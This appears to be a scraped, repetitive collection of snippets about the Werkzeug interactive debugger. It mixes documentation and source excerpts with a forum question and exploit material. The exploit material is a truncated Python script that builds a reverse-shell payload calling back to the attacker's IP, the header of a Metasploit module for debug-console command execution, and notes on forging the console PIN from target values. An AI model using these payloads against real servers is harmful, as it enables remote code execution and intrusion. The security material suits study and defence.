Enables debugging support for a given application: from werkzeug.debug import DebuggedApplication from myapp import app app = DebuggedApplication(app, evalex=True)

django-extensions: a swiss army knife toolset for django - beyond other useful tools it includes a management command (runserver_plus) to start the Werkzeug interactive debugger with your project

[docs] def __init__(self, app, evalex=False, request_key='werkzeug.request', console_path='/console', console_init_func=None, show_hidden_frames=False, lodgeit_url=None, pin_security=True, pin_logging=True): if lodgeit_url is not None: from warnings import warn warn(DeprecationWarning('Werkzeug now pastes into gists.')) if not console_init_func: console_init_func = None self.app = app self.evalex = evalex self.frames = {} self.tracebacks = {} self.request_key = request_key self.console_path = console_path self.console_init_func = console_init_func self.show_hidden_frames = show_hidden_frames self.secret = gen_salt(20) self._failed_pin_auth = 0 self.pin_logging = pin_logging if pin_security: # Print out the pin for the debugger on standard out.

October 3, 2018 - Also worth noting is that the debugger only accepts commands sent in by the GET-parameter, which will then show up in access logs on the vulnerable host, which is great for forensic analysis and investigation.

* Running on http://172.17.0.4:7777/ (Press CTRL+C to quit) * Restarting with stat User: werkzeug-user Module: flask.app Module Name: Flask App Location: /usr/local/lib/python3.9/site-packages/flask/app.py Mac Address: 2485377892356 Werkzeug Machine ID: b'ea1fc30b6f4a173cea015d229c6b55b69d0ff00819670374d7a02397bc236523a57e9bab0c6e6167470ac65b66075388' * Debugger is active!

"""Enables debugging support for a given application:: · from werkzeug.debug import DebuggedApplication · from myapp import app · app = DebuggedApplication(app, evalex=True) · The ``evalex`` argument allows ...

Enables debugging support for a given application: from werkzeug.debug import DebuggedApplication from myapp import app app = DebuggedApplication(app, evalex=True)

January 28, 2018 - #!/usr/bin/env python import requests import sys import re import urllib # usage : python exploit.py 192.168.56.101 5000 192.168.56.102 4422 if len(sys.argv) != 5: print "USAGE: python %s <ip> <port> <your ip> <netcat port>" % (sys.argv[0]) sys.exit(-1) response = requests.get('http://%s:%s/console' % (sys.argv[1],sys.argv[2])) if "Werkzeug " not in response.text: print "[-] Debug is not enabled" sys.exit(-1) # since the application or debugger about python using python for reverse connect cmd = '''import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("%s",%

February 18, 2020 - In particular, Werkzeug includes an interactive debugger that allows inspecting stack traces and source code in the browser.

Enables debugging support for a given application: from werkzeug.debug import DebuggedApplication from myapp import app app = DebuggedApplication(app, evalex=True)

<title>%(title)s // Werkzeug Debugger</title> <link rel="stylesheet" href="?__debugger__=yes&amp;cmd=resource&amp;f=style.css"> <link rel="shortcut icon" href="?__debugger__=yes&amp;cmd=resource&amp;f=console.png"> <script src="?__debugger__=yes&amp;cmd=resource&amp;f=debugger.js"></script> <script> var CONSOLE_MODE = %(console)s, EVALEX = %(evalex)s, EVALEX_TRUSTED = %(evalex_trusted)s, SECRET = "%(secret)s"; </script> </head> <body style="background-color: #fff"> <div class="debugger"> """ ·

This script produces the PIN by hashing the concatenated bits, adding specific salts (cookiesalt and pinsalt), and formatting the output. It’s important to note that the actual values for probably_public_bits and private_bits need to be accurately obtained from the target system to ensure the generated PIN matches the one expected by the Werkzeug console.

Python script for exploiting Werkzeug Debug RCE useful for CTFs where you just need to read a particular file or execute some command.

@app.route('/hello/:name') def say_hello(name): greet = {'en':'Hello', 'de':'Hallo', 'fr':'Bonjour'} language = req.accept_languages.best_match(greet.keys()) if language: return werkzeug.Response('%s %s!' % (greet[language], name)) else: raise werkzeug.exceptions.NotAcceptable() This plugin replaces the default error page with an advanced debugger.

Because a runserver and shell command is pretty common there are two factory functions that create such commands: def make_app(): from yourapplication import YourApplication return YourApplication(...) action_runserver = script.make_runserver(make_app, use_reloader=True) action_shell = script.make_shell(lambda: {'app': make_app()}) The script from above can be used like this from the shell now: $ ./manage.py --help $ ./manage.py runserver localhost 8080 --debugger --no-reloader $ ./manage.py runserver -p 4000 $ ./manage.py shell

April 8, 2019 - I’m trying to intentionally enter the Werkzeug interactive debugger using the snippet below, and placing debug() at desired breakpoints, but the browser never enter the debugger. All I get is an AssertionError in the command prompt. if os.environ.get('FLASK_ENV') == 'development': DEBUG = True else: DEBUG = False def debug(): assert DEBUG == False I’m trying to use this as an alternative to when ipdb doesn’t behave well, and until the highly anticipated dash-dev-tools comes out!

December 4, 2022 - A sample application which enables the console debugger is available here ... Do: check [+] 10.108.106.201:8081 - The target is vulnerable. ... You should get a shell. ... TARGETURI by default is /console, as defined by werkzeug, however it can be changed within the python script.

November 10, 2024 - This script produces the PIN by hashing the concatenated bits, adding specific salts (cookiesalt and pinsalt), and formatting the output. It's important to note that the actual values for probably_public_bits and private_bits need to be accurately obtained from the target system to ensure the generated PIN matches the one expected by the Werkzeug console.

September 30, 2021 - Locate vulnerable Werkzeug debug console at path vulnerable-site.com/console, but is locked by secret PIN number.

August 18, 2015 - ## # This module requires Metasploit: http://metasploit.com/download # Current source: https://github.com/rapid7/metasploit-framework ## require 'msf/core' require 'rex' class Metasploit4 < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::HttpClient def initialize(info = {}) super(update_info(info, 'Name' => 'Werkzeug Debug Shell Command Execution', 'Description' => %q{ This module will exploit the Werkzeug debug console to put down a Python shell. This debugger "must never be used on production machines" but sometimes slips passed testing.